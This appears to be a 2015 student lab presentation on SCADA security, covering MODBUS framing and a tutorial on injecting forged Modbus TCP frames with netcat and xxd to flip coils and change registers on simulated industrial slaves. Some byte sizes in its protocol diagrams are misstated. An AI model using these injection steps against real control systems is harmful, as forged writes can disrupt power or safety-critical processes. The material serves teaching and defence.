SCADA Security

Matt B., Joe F.

April 22, 2015

Applied Security

Executive Summary
SCADA Devices are used world wide. Security for these devices is necessary for these devices to work
properly.

This work is licensed under a Creative Commons Attribution 4.0 International License.

Contents
1

SCADA Security

What is SCADA?

History of SCADA Systems

SCADA Networks

SCADA Networks Security

MODBUS

RTAC

Problem Statement

News

10

Tutorial
10.1 Our Setup . . . . . . . . .
10.2 TCP Injection . . . . . . .
10.3 Network Monitoring . . . .
10.4 Craft TCP Data to Inject
10.5 Inject Traffic . . . . . . . .
10.6 Inject Traffic #2 . . . . . .

10

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

.
.
.
.
.
.

11
12
13
14
15
16
17

11

Conclusion

18

12

Quiz

19

13

Ansers

20

14 Revisions

21

1 SCADA Security
In this presentation we will discuss:
1. Introduction
2. Problem Statement
3. News
4. Tutorial
5. Conclusion

2 What is SCADA?
Supervisory Control And Data Acquisition (SCADA) system

Programmable Logic Controller (PLC)

Remote Terminal Unit (RTU) or Integrated Electronic Device
(IEDs)
Human Machine Interface (HMI)
Infrastructure

SCADA

Provide control over remote systems.

Subset of Industrial Control Systems (ICS)
Just a fancy name for what is typically a custom, multi-protocol, complex-network structure,
Real-Time Operating System (RTOS) controlled system used to control complex operations with
critical or time-sensitive operations.
PLC

Masters on some network, usually support one or possibly a few protocols

Used to control other devices (protocol slaves)
Usually report status up to some sort of monitoring device (HMI)
IED

Protocol slaves, controlled / monitored by a master

Generally responsible for doing the actual work in a system
Supervisory Computer

Data aggregation
Monitoring
Logging
Infrastructure

Network
Power
Mechanical
2

SCADA is used in many different types of systems. Some the most common uses include:
Power Plants
Manufacturing
Food Production
Utility Systems
Waist Water Treatment
Telecom Systems

Programmable Logic Controllers are the heart of the SCADA system. PLCs are used in collecting data
from Remote Terminal Units and sending new data based on the old data. The Supervisory Computer is
used in creating the logic that a PLC follows. Computers are also used for collecting statistical data on the
SCADA network or on the system the SCADA network controls.

3 History of SCADA Systems

Originally electro-mechanical / analog devices
Digital electronics

More features
Inter-connectivity

Master / slave structure

Point-to-point serial communications
Ethernet connectivity

Remote settings & monitoring

HMIs

Originally, ICS & SCADA systems were extremely complex mechanical then analog electronic circuits.
As electronics advanced, this began to change.
With advances in digital electronics, more highly featured systems were created with re-programmable
settings, then software settings, remote settings through serial, then finally settings accessible through Ethernet. Up through serial networking, the range of the networks was such that communications rarely left
the building. But once Ethernet was added, everything began changing.
Once people started realizing they could potentially use modems, wireless, or wired network connections
to check/repair systems remotely all sorts of security problems arose. This mainly stems from the fact that
power engineers are not typically well-versed in IT security, and the IT guys are typically not well-versed in
ICS/SCADA system protocols & infrastructure.
4

4 SCADA Networks

image source: https://www.selinc.com/WorkArea/DownloadAsset.aspx?id=6618

Control room

This is a managerial network whose purpose is to interconnect with the process-control networks.
This is where the entire system can be monitored. These typically receive data from multiple process
masters.
Legacy Networks

This normally means a slower serial protocol. This could be analog, digital, or serial (point-topoint RS232 connections or multi-drop RS485) connections. Typically there is at least one master
device. Each master is typically controlling a single process with at least one slave device under its
control. These slaves do the actual work unaware of other slaves. The master is the only device that
knows anything about the process as a whole.
Ethernet networks

These are typically implemented using upgrades to the legacy network devices. The concepts are
the same, but newer protocols and hardware layers are used. Fiber optics and wireless are possible in
these networks.

5 SCADA Networks Security

Where do you put the firewalls?

What latency would be added?

What are the requirements for the control system in use?
Where is encryption needed?

Whole packet encryption vs. data encryption

What about tunneling?
How much can physical security be relied on?

Can anyone access the transmission media?

Do the devices need passwords?
Analog vs. serial vs. wired vs. fiber vs. wireless

6 MODBUS
Developed by Modicon in 1979
Open protocol

Open protocols are the protocol equivalent of open source

Originally designed for serial ports
Has a TCP adaptation
Used by SCADA systems (like the one we will use today)

The MODBUS protocol we will be using today has a format in its data transfer:
For Serial:

+----+----+----------------+-------+
| ID |CODE|
DATA
| CRC |
+----+----+----------------+-------+
The unit ID is 2 bytes
The Function CODE is also 2 bytes
The DATA sent is 8 bytes
The CRC is 4 bytes
For TCP:

+--------+--------+--------+----+----+----------------+
| T ID
| P ID | LENGTH | ID |CODE|
DATA
|
+--------+--------+--------+----+----+----------------+
The Transaction ID is 4 bytes
The Protocol ID is 4 bytes
The LENGTH is 4 bytes
The ID CODE and DATA are the same

7 RTAC
The RTAC is a industrial computer designed by SEL
Used as a Programmable logic control (in our experiment)

8 Problem Statement
SCADA is everywhere
SCADA Security is not cut and paste security
SCADA security is not build into the hardware
Relies on secondary security methods

9 News
Hackers gain full control of critical SCADA systems (2014)
Stuxnet (2010)
Georgia Tackles Critical Infrastructure Attacks (2015)

10

10 Tutorial
Modbus TCP frame-crafting & injection
Read / Write Coils (bits)
Read / Write Registers (2 bytes)

Log into linux VM

Username:
Password:

11

10.1 Our Setup

SCADA devices

Modbus Master (RTAC) from Schweitzer Engineering Labs

(SEL)
Modbus Slaves (ModbusPal.jar)
Simulated slaves. Think circuit breaker, motor controller,
thermostat, etc. . .
Network

Hub representing a local control network

Could represent several different points in the network.

What can be done at this point? If it was was a typical control system, this network might be contained
in a single room. It is probably not realistic that this traffic would be on a network hub and that we have
access to it. It is more likely that we would have access to an engineering PC connected to a single PLC or
a few master devices.
But what if there was a distributed control system connecting several different individual control networks
in different rooms or buildings. What if it was connected to a corporate network for ease of management?
This scenario is a bit closer to what our network resembles.
12

10.2 TCP Injection

Netcat (source http://en.wikipedia.org/wiki/Netcat)
Tool for reading / writing TCP & UDP data
Run by typing nc into linux console

XXD
Binary ->ASCII or ASCII ->Binary
Run by typing xxd into the console

nc [DESTINATION IP] [DESTINATION PORT] [OPTIONS]

-p source port
-s source ip
xxd [OPTIONS] [IN FILE]

-h help
-r hex to binary
-p plain / continuous hex

13

10.3 Network Monitoring

Run Wireshark (as admin if neccesary)
Find Modbus traffic

Decode the Modbus traffic to figure out who is talking to whom

Understand the conversations that are going on

14

10.4 Craft TCP Data to Inject

create Modbus frame

Sequence # (2 bytes)
Protocol # (2 bytes
Length of remaining portion in bytes (2 bytes)
Slave address (1 byte)
Function code (1 byte)
Data (varies by function code / request / reply)
F1 Example:

012300000006030100020001

0123 | 0000 | 0006 | 03 | 01 | 0002 | 0001

SEQU | PROT | BYTS |SLAV|FUNC| COIL | COUNT

source: http://www.simplymodbus.ca/
Common Modbus Function Codes & Data Sections
Function 1: Read Coils (bits)

Request Data: coil # (2 bytes) # of coils (2 bytes)

Reply Data: # of bytes of coil data (1 byte) data bytes (varies)
Function 3: Read Holding Register (2 bytes)

Request Data: register # (2 bytes) # of registers requested (2 bytes)

Reply Data: # of data bytes register data
Function 5: Write Coil (1 bit)

Request Data: coil # (2 bytes) 0xFF00 for ON / 0x0000 for OFF (2 bytes)
Reply Data: coil # (2 bytes) written value (2 bytes)
Function 6: Write Holding Register (2 bytes)

Request Data: register # (2 bytes) write value (2 bytes)

Reply Data: register # (2 bytes) written value (2 bytes)

15

10.5 Inject Traffic

Try to flip a bit in one of the slaves (Funcion Code 5).

Keep in mind that this bit could represent the on/off switch for
power in a city.
Inject the crafted TCP data in a TCP connection

echo '0123456' | xxd -r -p | nc [10.10.10.X] [

PORT#]

16

10.6 Inject Traffic #2

Try to change a value in one of the slaves (Function Code 6).

Keep in mind that this could represent a setting for the process
which might impact functionality or safety.
Inject the crafted TCP data in a TCP connection

echo '0123456' | xxd -r -p | nc [10.10.10.X] [

PORT#]

17

11 Conclusion
SCADA is everywhere
Many industrial sites rely on working networks
SCADA security is not copy paste
Personal around SCADA networks need security training
A compromised SCADA network can be catastrophic

18

12 Quiz
1. Give an example of where a SCADA network would be found.
2. Why is SCADA security so difficult?
3. What is the protocol used by the SCADA network in this presentation?

19

13 Ansers
1. industrial sites, power plants, manufacturing plants
2. Security is not build into SCADA systems, it has to be added.
3. MODBUS

20

14

Revisions

Revision #
1.0

Comments
Matt B.

21